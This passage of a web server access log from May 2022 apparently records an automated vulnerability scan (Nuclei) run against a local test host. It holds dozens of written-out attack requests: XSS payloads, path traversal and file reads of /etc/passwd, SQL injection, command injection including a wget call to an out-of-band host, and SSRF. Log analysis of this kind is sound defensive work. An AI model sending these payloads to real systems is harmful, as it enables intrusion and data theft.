/?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22bulk\x22,\x0D\x0A \x22source\x22: \x22default\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22: \x22run_sql\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22source\x22:\x22default\x22,\x0D\x0A \x22sql\x22:\x22SELECT pg_read_file('/etc/passwd',0,100000);\x22,\x0D\x0A \x22cascade\x22: false,\x0D\x0A \x22read_only\x22: false\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /camunda/app/welcome/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/search/..%5C..%5C..%5Cconf%5Copenfire.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/oksAutoRenewalHelp.jsp%3Fthanks%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MFgexJ2EbKwAv0kRVcoTcSFn')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"&act=sync&task_number=1;wget http://c9v8gc8smpv8b0ng0t00ue1hnborz8s4i.oast.online","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /en/php/usb_sync.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xml/User/User.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ipython/tree HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"user=pdnuclei%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd=pdnuclei","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actions/authenticate.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nagios/side.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"_dlg[captcha][target]=system(\x5C'ver\x5C')\x5C","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webmail/basic/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/ieuiMeetingErrorDisplay.jsp%3FErrCode%3D%27%22%3E%3Csvg%2Fonload%3Dalert('297MFgexJ2EbKwAv0kRVcoTcSFn')%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lab.html?vpath=//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor_tools/module?type=files/admin\x22>¶ms=filetype=images HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /OA_HTML/bin/sqlnet.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /new/newhttp://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /default.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /robots.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/configs/application.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&tag= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backend/admin/users?username=anonymous HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://c9v8gc8smpv8b0ng0t003i3p87atqikuh.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /healthz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:33:04 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/mc4wp-debug.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows 